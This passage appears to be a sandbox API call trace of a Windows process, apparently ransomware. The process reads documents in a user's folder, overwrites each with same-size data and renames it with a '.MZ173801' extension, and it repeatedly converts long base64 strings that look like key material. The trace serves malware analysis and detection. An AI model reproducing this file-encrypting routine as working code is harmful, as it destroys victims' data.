lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.201] GetCurrentThreadId () returned 0x1358 [0122.201] GetCurrentThreadId () returned 0x1358 [0122.201] GetCurrentThreadId () returned 0x1358 [0122.201] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.201] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.202] GetCurrentThreadId () returned 0x1358 [0122.202] GetCurrentThreadId () returned 0x1358 [0122.202] GetCurrentThreadId () returned 0x1358 [0122.202] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\nZr6PHEvCUKrD5BUDBLc.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\nzr6phevcukrd5budblc.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.202] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.202] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.202] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x13909 [0122.202] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.202] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x13909, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x13909, lpOverlapped=0x0) returned 1 [0122.204] CloseHandle (hObject=0x408) returned 1 [0122.205] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\nZr6PHEvCUKrD5BUDBLc.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\nzr6phevcukrd5budblc.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.206] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x13909, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x13909, lpOverlapped=0x0) returned 1 [0122.209] CloseHandle (hObject=0x408) returned 1 [0122.209] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\nZr6PHEvCUKrD5BUDBLc.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\nzr6phevcukrd5budblc.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\nZr6PHEvCUKrD5BUDBLc.rtf.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\nzr6phevcukrd5budblc.rtf.mz173801")) returned 1 [0122.210] GetCurrentThreadId () returned 0x1358 [0122.210] GetCurrentThreadId () returned 0x1358 [0122.210] GetCurrentThreadId () returned 0x1358 [0122.210] GetCurrentThreadId () returned 0x1358 [0122.210] GetCurrentThreadId () returned 0x1358 [0122.210] GetCurrentThreadId () returned 0x1358 [0122.210] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0cde70, ftCreationTime.dwHighDateTime=0x1d5e654, ftLastAccessTime.dwLowDateTime=0xc6509f0, ftLastAccessTime.dwHighDateTime=0x1d5e4a6, ftLastWriteTime.dwLowDateTime=0xc6509f0, ftLastWriteTime.dwHighDateTime=0x1d5e4a6, nFileSizeHigh=0x0, nFileSizeLow=0x186d9, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="qeFEt94 ZkESq80bTrZv.ots", cAlternateFileName="QEFET9~1.OTS")) returned 1 [0122.210] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.210] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.210] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d2ea20, ftCreationTime.dwHighDateTime=0x1d5f087, ftLastAccessTime.dwLowDateTime=0xc65aa60, ftLastAccessTime.dwHighDateTime=0x1d5e710, ftLastWriteTime.dwLowDateTime=0xc65aa60, ftLastWriteTime.dwHighDateTime=0x1d5e710, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="TrIgUDcr5i55m8wcE.xls", cAlternateFileName="TRIGUD~1.XLS")) returned 1 [0122.210] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.210] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.210] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\TrIgUDcr5i55m8wcE.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\trigudcr5i55m8wce.xls"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d2ea20, ftCreationTime.dwHighDateTime=0x1d5f087, ftLastAccessTime.dwLowDateTime=0xc65aa60, ftLastAccessTime.dwHighDateTime=0x1d5e710, ftLastWriteTime.dwLowDateTime=0xc65aa60, ftLastWriteTime.dwHighDateTime=0x1d5e710, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0)) returned 1 [0122.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.211] GetCurrentThreadId () returned 0x1358 [0122.211] GetCurrentThreadId () returned 0x1358 [0122.211] GetCurrentThreadId () returned 0x1358 [0122.212] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.212] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.212] GetCurrentThreadId () returned 0x1358 [0122.212] GetCurrentThreadId () returned 0x1358 [0122.212] GetCurrentThreadId () returned 0x1358 [0122.212] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\TrIgUDcr5i55m8wcE.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\trigudcr5i55m8wce.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.212] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.212] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.212] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xa5c0 [0122.213] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.213] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0xa5c0, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0xa5c0, lpOverlapped=0x0) returned 1 [0122.214] CloseHandle (hObject=0x408) returned 1 [0122.214] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\TrIgUDcr5i55m8wcE.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\trigudcr5i55m8wce.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.215] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xa5c0, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0xa5c0, lpOverlapped=0x0) returned 1 [0122.217] CloseHandle (hObject=0x408) returned 1 [0122.217] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\TrIgUDcr5i55m8wcE.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\trigudcr5i55m8wce.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\TrIgUDcr5i55m8wcE.xls.MZ173801" (normalized: 